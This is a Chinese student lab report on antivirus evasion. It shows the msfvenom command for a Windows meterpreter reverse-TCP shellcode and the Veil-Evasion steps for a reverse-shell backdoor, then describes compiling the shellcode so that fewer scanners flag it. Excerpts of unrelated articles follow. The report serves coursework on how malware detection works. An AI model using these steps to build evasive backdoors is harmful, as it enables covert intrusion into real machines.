20145232韓文浩《網路對抗》 免殺原理與實踐

2022-05-23 07:39:12 字數 1872 閱讀 4367

1.殺軟是如何檢測出惡意**的?

2.免殺是做什麼?

3.免殺的基本方法有哪些?

在本次實驗中,

win8 172.20.10.3

linux 192.168.31.132

使用msf生成後門檔案的檢測

在之前的實驗中,我們已經生成了乙個木馬程式。

可以通過virscan.org來檢驗一下病毒的抗殺能力。掃瞄結果如下:

從圖中可以看出,報毒率還是挺高的,39款殺軟中就有22款掃瞄出病毒,基本上現在主流的殺軟都能查殺出來。

msfvenom使用編碼器生成meterpreter可執行檔案

veil-evasion生成後門檔案的檢測

veil-evasion是乙個與metasploit有點類似的免殺平台,用其他語言如c,c#,phython,ruby,go,powershell等重寫了meterperter,然後再通過不同方式編譯成exe。

在終端下輸入指令veil-evasion開啟軟體,根據menu的提示依次輸入以下指令:

use python/meterpreter/rev_tcp//設定payload

set lhost 192.168.18.128//設定**連線ip

set port 443//設定**埠443,預設為4444

generate//生成

5232//程式名

放到virscan.org**上掃瞄一下:

比之前用msf生成的檔案報毒率要更低,僅有10個引擎報毒。

c語言呼叫shellcode

在kali主機下,進入終端,執行指令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=443 -f c

將上述**從虛擬機器裡copy出來,用microsoft visual studio 2013進行編譯執行生成可執行檔案

nc111.cpp

在kali下進入msf開啟監聽程序

在靶機上執行nc111可執行檔案,kali成功獲取許可權

virscan.org檢測結果如下:

此檔案有4個引擎報毒風險已經降低了不少,但是仍被定性為病毒檔案。

win8.1 電腦管家共存

這次實驗讓我充分理解了免殺原理,有不少方法可以免殺,為電腦帶來一些潛在的風險。現如今社會,處處離不開網路,需要提高安全防範意識,定期檢查電腦,防止別人惡意盜用資訊。

20145232韓文浩《網路對抗》PC平台逆向破解

1 linux下有兩種基本構造攻擊buf的方法 retaddr nop shellcode,nop shellcode retaddr。我們採用anything retaddr nops shellcode的方法。2 實驗的目標是找到返回位址的位置和shellcode的位址。然後通過修改返回位址使其...

半監督生成對抗網路 生成對抗網路

一 生成對抗網路相關概念 一 生成模型在概率統計理論中,生成模型是指能夠在給定某些隱含引數的條件下,隨機生成觀測資料的模型,它給觀測值和標註資料序列指定乙個聯合概率分布。在機器學習中,生成模型可以用來直接對資料建模,也可以用來建立變數間的條件概率分布。通常可以分為兩個型別,一種是可以完全表示出資料確...

生成對抗網路

我們提出乙個框架來通過對抗方式評估生成模型,我們同時訓練兩個模型 乙個生成模型g捕捉資料分布,乙個鑑別模型d估計乙個樣本來自於訓練資料而不是g的概率。g的訓練過程是最大化d犯錯的概率。這個框架與minmax兩個玩家的遊戲相對應。在任意函式g和d的空間存在乙個唯一解,g恢復訓練資料的分布,d等於1 2...